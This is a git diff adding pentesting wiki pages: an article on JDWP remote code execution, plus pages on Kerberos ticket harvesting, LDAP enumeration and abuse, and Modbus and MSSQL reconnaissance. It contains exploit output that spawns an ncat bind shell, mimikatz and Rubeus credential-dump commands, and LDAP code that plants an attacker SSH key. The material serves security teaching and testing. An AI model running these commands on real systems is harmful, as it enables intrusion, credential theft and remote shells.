+ root:~/tools/scapy-hg \# ip addr show dev eth0 \| grep “inet “    inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0root:~/tools/scapy-hg \# ./run\_scapy
+
+ Welcome to Scapy \(2.2.0-dev\)  
+**&gt;&gt;&gt;** sniff\(filter=”tcp port 8000 and host 192.168.2.9″, count=8\)  
+&lt;Sniffed: TCP:9 UDP:1 ICMP:0 Other:0&gt;  
+**&gt;&gt;&gt;** tcp.hexraw\(\)  
+0000 15:49:30.397814 Ether / IP / TCP 192.168.2.2:59079 &gt; 192.168.2.9:8000 S  
+0001 15:49:30.402445 Ether / IP / TCP 192.168.2.9:8000 &gt; 192.168.2.2:59079 SA  
+0002 15:49:30.402508 Ether / IP / TCP 192.168.2.2:59079 &gt; 192.168.2.9:8000 A  
+0003 15:49:30.402601 Ether / IP / TCP 192.168.2.2:59079 &gt; 192.168.2.9:8000 PA / Raw  
+**0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake**  
+0004 15:49:30.407553 Ether / IP / TCP 192.168.2.9:8000 &gt; 192.168.2.2:59079 A  
+0005 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 &gt; 192.168.2.2:59079 A  
+0006 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 &gt; 192.168.2.2:59079 PA / Raw  
+**0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake**  
+0007 15:49:30.407636 Ether / IP / TCP 192.168.2.2:59079 &gt; 192.168.2.9:8000 A
+
+An experienced security auditor may have already realised that such a simple handshake offers a way to easily uncover live JDWP services on the Internet. Just send one simple probe and check for the specific response.  More interestingly, a behavior was observed on the IBM Java Development Kit when scanning with ShodanHQ\[4\] with the server “talking” first with the very same banner mentioned. As a consequence, there is a totally passive way to discover an active JDWP service \(this is covered later on in this article with the help of the \(in\)famous Shodan\).  
+  
+**Communication**JDWP defines messages\[10\] involved in communications between the Debugger and the Debuggee.  The messages follow a simple structure, defined as follows: [![](https://ioactive.com/wp-content/uploads/2014/04/createstring.png)](https://ioactive.com/wp-content/uploads/2014/04/createstring-1.png)
+
+ The Length and Id fields are rather self explanatory. The Flag field is only used to distinguish request packets from replies, a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command as shown in the following table.   
+  
+
+
+| **CommandSet** |    **Command** |
+| :--- | :--- |
+| 0x40  |    Action to be taken by the JVM \(e.g. setting a BreakPoint\) |
+| 0x40–0x7F      |    Provide event information to the debugger \(e.g. the JVM has       hit a BreakPoint and is waiting for further actions\) |
+| 0x80 |    Third-party extensions |
+
+ Keeping in mind that we want to execute arbitrary code, the following commands are the most interesting for our purposes.
+
+* VirtualMachine/IDSizes defines the size of the data structures handled by the JVM. This is one of the reasons why the nmap script jdwp-exec.nse\[11\] does not work, since the script uses hardcoded sizes.
+* ClassType/InvokeMethod allows you to invoke a static function.
+* ObjectReference/InvokeMethod allows you to invoke a function from an instantiated object in the JVM.
+* StackFrame/\(Get\|Set\)Values provides pushing/popping capabilities from threads stack.
+* Event/Composite forces the JVM to react to specific behaviors declared by this command. This command is a major key for debugging purposes as it allows, among many other things, setting breakpoints, single-stepping through the threads during runtime, and being notified when accessing/modifying values in the exact same manner as GDB or WinDBG.
+
+ Not only does JDWP allow you to access and invoke objects already residing in memory, it also allows you to create or overwrite data.
+
+* VirtualMachine/CreateString allows  you to transform a string into a java.lang.String living in the JVM runtime.
+* VirtualMachine/RedefineClasses allows you to install new class definitions.
+
+ **“All your JDWP are belong to us”**
+
+As we have seen, JDWP provides built-in commands to load arbitrary classes into the JVM memory and invoke already existing and/or newly loaded bytecode. The following section will cover the steps for creating exploitation code in Python, which behaves as a partial implementation of a JDI front end in order to be as reliable as possible. The main reason for this standalone exploit script is that, as a pentester, I like “head-shot” exploits. That is, when I know for sure an environment/application/protocol is vulnerable, I want to have my tool ready to exploit it right away \(i.e. no PoC, which is basically the only thing that existed so far\). So now that we have covered the theory, let’s get into the practical implementation. When faced with an open JDWP service, arbitrary command execution is exactly five steps away \(or with this exploit, only one command line away\). Here is how it would go down: 1. Fetch Java Runtime referenceThe JVM manipulates objects through their references. For this reason, our exploit must first obtain the reference to the java.lang.Runtime class. From this class, we need the reference to the getRuntime\(\) method. This is performed by fetching all classes \(AllClasses packet\) and all methods in the class we are looking for \(ReferenceType/Methods packet\). 2. Setup breakpoint and wait for notification \(asynchronous calls\)This is the key to our exploit. To invoke arbitrary code, we need to be in a running thread context. To do so, a hack is to setup a breakpoint on a method which is known to be called at runtime. As seen earlier, a breakpoint in JDI is an asynchronous event whose type is set to BREAKPOINT\(0x02\). When hit, the JVM sends an EventData packet to our debugger, containing our breakpoint ID, and more importantly, the reference to the thread which hit it.  
+  
+[![](https://ioactive.com/wp-content/uploads/2014/04/event_break.png)](https://ioactive.com/wp-content/uploads/2014/04/event_break-1.png)
+
+ It is therefore a good idea to set it on a frequently called method, such as java.net.ServerSocket.accept\(\), which is very likely to be called every time the server receives a new network connection. However, one must bear in mind that it could be any method existing at runtime. 3. Allocating a Java String object in Runtime to carry out the payloadWe will execute code in the JVM runtime, so all of our manipulated data \(such as string\) must exist in the JVM runtime \(i.e. possess an runtime reference\). This is done quite easily by sending a CreateString command.
+
+ [![](https://ioactive.com/wp-content/uploads/2014/04/Untitled.png)](https://ioactive.com/wp-content/uploads/2014/04/Untitled-1.png)
+
+  4. Get Runtime object from breakpoint contextAt this point we have almost all of the elements we need for a successful, reliable exploitation. What we are missing is a Runtime object reference. Obtaining it is easy, and we can simply execute in the JVM runtime the java.lang.Runtime.getRuntime\(\) static method\[8\] by sending a ClassType/InvokeMethod packet and providing the Runtime class and thread references. 5. Lookup and invoke exec\(\) method in Runtime instanceThe final step is simply looking for the exec\(\) method in the Runtime static object obtained for the previous step and invoking it \(by sending a ObjectReference/InvokeMethod packet\) with the String object we created in step three.  [![](https://ioactive.com/wp-content/uploads/2014/04/exec.png)](https://ioactive.com/wp-content/uploads/2014/04/exec-1.png)
+
+Et voilà !! Swift and easy. As a demonstration, let’s start a Tomcat running with JPDA “debug mode” enabled:
+
+ root@pwnbox:~/apache-tomcat-6.0.39\# ./bin/catalina.sh jpda start
+
+ We execute our script without a command to execute, to simply get general system information:
+
+```text
+hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9 
+[+] Targeting ‘192.168.2.9:8000’
+[+] Reading settings for ‘Java HotSpot(TM) 64-Bit Server VM – 1.6.0_65’
+[+] Found Runtime class: id=466[+] Found Runtime.getRuntime(): id=7facdb6a8038
+[+] Created break event id=2
+[+] Waiting for an event on ‘java.net.ServerSocket.accept’## Here we wait for breakpoint to be triggered by a new connection ##
+[+] Received matching event from thread 0x8b0
+[+] Found Operating System ‘Mac OS X’
+[+] Found User name ‘pentestosx’
+[+] Found ClassPath ‘/Users/pentestosx/Desktop/apache-tomcat-6.0.39/bin/bootstrap.jar’
+[+] Found User home directory ‘/Users/pentestosx’
+[!] Command successfully executed
+```
+
+Same command line, but against a Windows system and breaking on a totally different method:
+
+```text
+hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 –break-on ‘java.lang.String.indexOf’
+[+] Targeting ‘192.168.2.8:8000’
+[+] Reading settings for ‘Java HotSpot(TM) Client VM – 1.7.0_51’
+[+] Found Runtime class: id=593
+[+] Found Runtime.getRuntime(): id=17977a9c
+[+] Created break event id=2
+[+] Waiting for an event on ‘java.lang.String.indexOf’
+[+] Received matching event from thread 0x8f5
+[+] Found Operating System ‘Windows 7’
+[+] Found User name ‘hugsy’
+[+] Found ClassPath ‘C:UsershugsyDesktopapache-tomcat-6.0.39binbootstrap.jar’
+[+] Found User home directory ‘C:Usershugsy’
+[!] Command successfully executed
+```
+
+We execute our exploit to spawn a bind shell with the payload  “ncat -e /bin/bash -l -p 1337”, against a Linux system:
+
+```text
+hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 –cmd ‘ncat -l -p 1337 -e /bin/bash’
+[+] Targeting ‘192.168.2.8:8000’
+[+] Reading settings for ‘OpenJDK Client VM – 1.6.0_27’
+[+] Found Runtime class: id=79d
+[+] Found Runtime.getRuntime(): id=8a1f5e0
+[+] Created break event id=2
+[+] Waiting for an event on ‘java.net.ServerSocket.accept’
+[+] Received matching event from thread 0x82a[+] Selected payload ‘ncat -l -p 1337 -e /bin/bash’
+[+] Command string object created id:82b
+[+] Runtime.getRuntime() returned context id:0x82c
+[+] found Runtime.exec(): id=8a1f5fc[+] Runtime.exec() successful, retId=82d
+[!] Command successfully executed Success, we now have a listening socket!
+root@pwnbox:~/apache-tomcat-6.0.39# netstat -ntpl | grep 1337
+tcp        0      0 0.0.0.0:1337         0.0.0.0:*               LISTEN      19242/ncat      
+tcp6       0      0 :::1337              :::*                    LISTEN      19242/ncat     
+```
+
+The final exploit uses those techniques, adds a few checks, and sends suspend/resume signals to cause as little disruption as possible \(it’s always best not to break the application you’re working on, right?\). It acts in two modes: 
+
+* “Default” mode is totally non intrusive and simply executes Java code to get local system information \(perfect for a PoC to a client\).
+* Passing the “cmd” option executes a system command on the remote host and is therefore more intrusive. The command is done with the privileges the JVM is running with.
+
+ This exploit script was successfully tested against:
+
+* Oracle Java JDK 1.6 and 1.7
+* OpenJDK 1.6
+* IBM JDK 1.6
+
+ As Java is platform-independent by design, commands can be executed on any operating system that Java supports. Well this is actually good news for us pentesters: **open JDWP service means reliable RCE**.  So far, so good.
+
+### **What about real-life exploitation?**
+
+As a matter of fact, JDWP is used quite a lot in the Java application world. Pentesters might, however, not see it that often when performing remote assessments as firewalls would \(and should\) mostly block the port it is running on. But this does not mean that JDWP cannot be found in the wild:
+
+* At the time of writing this article, a quick search on ShodanHQ\[4\] immediately reveals about 40 servers sending the JDWP handshake:
+
+![](https://ioactive.com/wp-content/uploads/2014/04/shodan.png)
+
+ This is actually an interesting finding because, as we’ve seen before, it is supposed to be the client-side \(debugger\) that initiates dialogue.
+
+* GitHub\[7\] also reveals a significant number of potentially vulnerable open-source applications:
+
+![](https://ioactive.com/wp-content/uploads/2014/04/github.png)
+
+* masscan-ing the Internet looking for specific ports \(tcp/8000, tcp/8080, tcp/8787, tcp/5005\) revealed many hosts \(which cannot be reported here\) responding to the initial handshake.
+* “Enterprise” applications were found in the wild running a JDWP service \*by default\* \(finding the actual port number is left as an exercise to the curious reader\).
+
+ These are just a few ways to discover open JDWP services on the Internet. This is a great reminder that applications should regularly undergo thorough security reviews, production environments should have any debugging functionality turned off, and firewalls should be configured to restrict access to services required for normal operation only. Allowing anybody to connect to a JDWP service is exactly the same as allowing a connection to a gdbserver service \(in what may be a more stable way\). I hope you enjoyed reading this article as much as I enjoyed playing with JDWP.  To y’all mighty pirates, happy JDWP pwning !!
+
+**Thanks**  
+  
+****I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests.
+
+### **References:**
+
+1. [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
+2. [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html)
+3. http://www.secdev.org/projects/scapy\(no longer active\)
+4. [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE) 
+5. http://www.hsc-news.com/archives/2013/000109.html \(no longer active\) 
+6. [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt) 
+7. https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
+8. [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
+9. [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com/)
+10. [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
+11. [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
+
diff --git a/pentesting/pentesting-kerberos-88/README.md b/pentesting/pentesting-kerberos-88/README.md
new file mode 100644
index 00000000..bb0bc0ee
--- /dev/null
+++ b/pentesting/pentesting-kerberos-88/README.md
@@ -0,0 +1,30 @@
+# 88tcp/udp - Pentesting Kerberos
+
+## Basic Information
+
+Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.  
+Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.
+
+**Default Port:** 88/tcp/udp
+
+```text
+PORT   STATE SERVICE
+88/tcp open  kerberos-sec
+```
+
+### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows/active-directory-methodology/)**.**
+
+## More
+
+### Shodan
+
+* `port:88 kerberos`
+
+### MS14-068
+
+Simply stated, the vulnerability enables an attacker to modify an existing, valid, domain user logon token \(Kerberos Ticket Granting Ticket, TGT, ticket\) by adding the false statement that the user is a member of Domain Admins \(or other sensitive group\) and the Domain Controller \(DC\) will validate that \(false\) claim enabling attacker improper access to any domain \(in the AD forest\) resource on the network.
+
+{% embed url="https://adsecurity.org/?p=541" %}
+
+Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
+
diff --git a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
new file mode 100644
index 00000000..4ff9206e
--- /dev/null
+++ b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
@@ -0,0 +1,28 @@
+# Harvesting tickets from Linux
+
+On Linux, **tickets are stored in credential caches or ccaches**. There are 3 main types, which indicate where **tickets can be found:**
+
+* **Files**, by default under **/tmp** directory, in the form of **krb5cc\_%{uid}.**
+* **Kernel Keyrings**, an special space in the Linux kernel provided for storing keys.
+* **Process memory,** used when only one process needs to use the tickets.
+
+To verify what type of storage is used in a specific machine, the variable _**default\_ccache\_name**_ ****must be checked in the **/etc/krb5.conf** file, which by default has read permission to any user. In case of this parameter being missing, its default value is _FILE:/tmp/krb5cc\_%{uid}_.
+
+In order to extract **tickets from the other 2 sources** \(keyrings and processes\), a great paper, [**Kerberos Credential Thievery \(GNU/Linux\)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), released in 2017, explains ways of recovering the tickets from them.
+
+#### Keyring - From the paper
+
+> The **Linux kernel** has a feature called **keyrings**. This is an **area of memory residing** within the kernel that is used to **manage and retain keys**.
+>
+> The **keyctl system call** was introduced in kernel version 2.6.10 5 . This provides **user space applications an API** which can be used to interact with kernel keyrings.
+
+> The **name of the keyring** in use can be parsed from the **Kerberos configuration file /etc/krb5.conf** which has read permission enable for anybody \(octal 644\) by default. An attacker can then leverage this information to **search for ticket** 11 containing keyrings and extract the tickets. A proof of concept script that implements this functionality can be seen in Section A.2 **\(hercules.sh\)**. In a keyring the ccache is stored as components. As seen in Figure 2, a file ccache is made up of 3 distinct components: header, default principal, and a sequence of credentials. A **keyring holds the default principal and credentials**. This script will dump these components to separate files. Then using an **attacker synthesised header** these pieces are combined in the correct order to **rebuild a file ccache**. This rebuilt file can then be exfiltrated to an attacker machine and then used to impersonate a Kerberos user. A simple program for generating a valid ccache header can be seen in Section A.3.
+
+Based on the **heracles.sh script** \(from the paper\) a C tool you can use \(created by the author of the complete post\) is [**tickey**](https://github.com/TarlogicSecurity/tickey)**,  and it extracts tickets from keyrings:**
+
+```text
+/tmp/tickey -i
+```
+
+**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)\*\*\*\*
+
diff --git a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
new file mode 100644
index 00000000..06ef8259
--- /dev/null
+++ b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
@@ -0,0 +1,13 @@
+# Harvesting tickets from Windows
+
+In Windows, tickets are **handled and stored by the lsass** \(Local Security Authority Subsystem Service\) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to **communicate with lsass and ask for them**. As a **non-administrative user only owned tickets can be fetched**, however, as machine **administrator**, **all** of them can be harvested. For this purpose, the tools **Mimikatz or Rubeus** can be used as shown below:
+
+```
+mimikatz # sekurlsa::tickets /export
+.\Rubeus dump
+[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
+```
+
+**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**​**[  
+](https://app.gitbook.com/@cpol/s/hacktricks/~/drafts/-LhAFG7vZpkSqhe9Wmev/primary/todo/pentesting-kerberos-88/harvesting-tickets-from-windows)
+
diff --git a/pentesting/pentesting-ldap.md b/pentesting/pentesting-ldap.md
new file mode 100644
index 00000000..fd07faae
--- /dev/null
+++ b/pentesting/pentesting-ldap.md
@@ -0,0 +1,247 @@
+# 389, 636, 3268, 3269 - Pentesting LDAP
+
+## Basic Information
+
+Extracted from: [https://searchmobilecomputing.techtarget.com/definition/LDAP](https://searchmobilecomputing.techtarget.com/definition/LDAP)
+
+LDAP \(Lightweight Directory Access Protocol\) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a "lightweight" \(smaller amount of code\) version of Directory Access Protocol \(DAP\).
+
+An LDAP directory can be distributed among many servers. Each server can have a replicated version of the total directory that is synchronized periodically. An LDAP server is called a Directory System Agent \(DSA\). An LDAP server that receives a request from a user takes responsibility for the request, passing it to other DSAs as necessary, but ensuring a single coordinated response for the user.
+
+An LDAP directory is organized in a simple "tree" hierarchy consisting of the following levels:
+
+* The root directory \(the starting place or the source of the tree\), which branches out to
+* Countries, each of which branches out to
+* Organizations, which branch out to
+* Organizational units \(divisions, departments, and so forth\), which branches out to \(includes an entry for\)
+* Individuals \(which includes people, files, and shared resources such as printers\)
+
+**Default port:** 389 and 636\(ldaps\). Global Catalog \(LDAP in ActiveDirectory\) is available by default on ports 3268, and 3269 for LDAPS.
+
+```text
+PORT    STATE SERVICE REASON
+389/tcp open  ldap    syn-ack
+636/tcp open  tcpwrapped
+```
+
+## Basic Enumeration
+
+### Manual
+
+You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
+
+First try to **connect without** credentials:
+
+```bash
+>>> import ldap3
+>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
+>>> connection = ldap3.Connection(server)
+>>> connection.bind()
+True
+>>> server.info
+```
+
+If the response is `True` like in the previous example, you can obtain some **interesting data** of the LDAP \(like the **naming context** or **domain name**\) server from:
+
+```bash
+>>> server.info
+DSA info (from DSE):
+Supported LDAP versions: 3
+Naming contexts: 
+dc=DOMAIN,dc=DOMAIN
+```
+
+Once you have the naming context you can make some more exciting queries. This simply query should show you all the objects in the directory:
+
+```bash
+>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
+True
+>> connection.entries
+```
+
+Or **dump** the whole ldap:
+
+```bash
+>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
+True
+>>> connection.entries
+```
+
+### Automated
+
+Using this you will be able to see the **public information** \(like the domain name\)**:**
+
+```bash
+nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
+```
+
+## Write data
+
+Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**.
+
+```bash
+>>> import ldap3
+>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
+>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
+>>> connection.bind()
+True
+>>> connection.extend.standard.who_am_i()
+u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
+>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
+```
+
+Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
+
+## Clear text credentials
+
+If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
+
+Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login.
+
+**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
+
+## Valid Credentials
+
+If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
+
+[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
+
+```bash
+pip3 install ldapdomaindump 
+ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
+```
+
+### [Brute Force](../brute-force.md#ldap)
+
+### Manual
+
+Check null credentials or if your credentials are valid:
+
+```bash
+ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+```bash
+## CREDENTIALS NOT VALID RESPONSE
+search: 2
+result: 1 Operations error
+text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
+ tion a successful bind must be completed on the connection., data 0, v3839
+```
+
+If you find something saying that the "_bind must be completed_" means that the credentials arr incorrect.
+
+You can extract **everything from a domain** using:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
+-x Simple Authentication
+-h LDAP Server
+-D My User
+-w My password
+-b Base site, all data from here will be given
+```
+
+Extract **users**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
+#Example: ldapsearch -x -h <IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
+```
+
+Extract **computers**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+Extract **my info**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+Extract **Domain Admins**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+Extract **Domain Users**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+Extract **Enterprise Admins**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+Extract **Administrators**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+Extract **Remote Desktop Group**:
+
+```bash
+ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
+```
+
+To see if you have access to any password you can use grep after executing one of the queries:
+
+```bash
+<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
+```
+
+Please, notice that the passwords that you can find here could not be the real ones...
+
+## Graphical Interface
+
+You can download a graphical interface with LDAP server here: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
+
+By default is is installed in: _/opt/jxplorer_
+
+![](../.gitbook/assets/image%20%28106%29.png)
+
+## Authentication via kerberos
+
+Using `ldapsearch` you can **authenticate** against **kerberos instead** of via **NTLM** by using the parameter `-Y GSSAPI`
+
+## POST
+
+If you can access the files where the databases are contained \(could be in _/var/lib/ldap_\). You can extract the hashes using:
+
+```bash
+cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
+```
+
+You can feed john with the password hash \(from '{SSHA}' to 'structural' without adding 'structural'\).
+
+### Configuration Files
+
+* General
+  * containers.ldif
+  * ldap.cfg
+  * ldap.conf
+  * ldap.xml
+  * ldap-config.xml
+  * ldap-realm.xml
+  * slapd.conf
+* IBM SecureWay V3 server
+  * V3.sas.oc
+* Microsoft Active Directory server
+  * msadClassesAttrs.ldif
+* Netscape Directory Server 4
+  * nsslapd.sas\_at.conf
+  * nsslapd.sas\_oc.conf
+* OpenLDAP directory server
+  * slapd.sas\_at.conf
+  * slapd.sas\_oc.conf
+* Sun ONE Directory Server 5.1
+  * 75sas.ldif
+
diff --git a/pentesting/pentesting-modbus.md b/pentesting/pentesting-modbus.md
new file mode 100644
index 00000000..bb1adc5b
--- /dev/null
+++ b/pentesting/pentesting-modbus.md
@@ -0,0 +1,21 @@
+# 502 - Pentesting Modbus
+
+## Basic Information
+
+Modbus Protocol is a messaging structure developed by Modicon in 1979. It is used to establish master-slave/client-server communication between intelligent devices.
+
+**Default port:** 502
+
+```text
+PORT    STATE SERVICE
+502/tcp open  modbus
+```
+
+## Enumeration
+
+```bash
+nmap --script modbus-discover -p 502 <IP>
+msf> use auxiliary/scanner/scada/modbusdetect
+msf> use auxiliary/scanner/scada/modbus_findunitid
+```
+
diff --git a/pentesting/pentesting-mssql-microsoft-sql-server.md b/pentesting/pentesting-mssql-microsoft-sql-server.md
new file mode 100644
index 00000000..1cac19f4
--- /dev/null
+++ b/pentesting/pentesting-mssql-microsoft-sql-server.md
@@ -0,0 +1,201 @@
+# 1433 - Pentesting MSSQL - Microsoft SQL Server
+
+## Basic Information
+
+ **Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database_server), it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application)—which may run either on the same computer or on another computer across a network \(including the Internet\).  
+From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server).
+
+**Default port:** 1433
+
+```text
+1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
+```
+
+Search for _exploits/scripts/auxiliary modules_ that can be helpful to find vulnerabilities in this kind of service:
+
+```bash
+searchsploit "microsoft sql server"
+nmap --script-help "*ms* and *sql*"
+msf> search mssql
+```
+
+## Information
+
+### **Default MS-SQL System Tables**
+
+* **master Database** : Records all the system-level information for an instance of SQL Server.
+* **msdb Database** : Is used by SQL Server Agent for scheduling alerts and jobs.
+* **model Database** : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
+* **Resource Database** : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
+* **tempdb Database** : Is a work-space for holding temporary objects or intermediate result sets.
+
+## Info Gathering
+
+If you don't know nothing about the service:
+
+```bash
+nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
+msf> use auxiliary/scanner/mssql/mssql_ping
+```
+
+If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username.
+
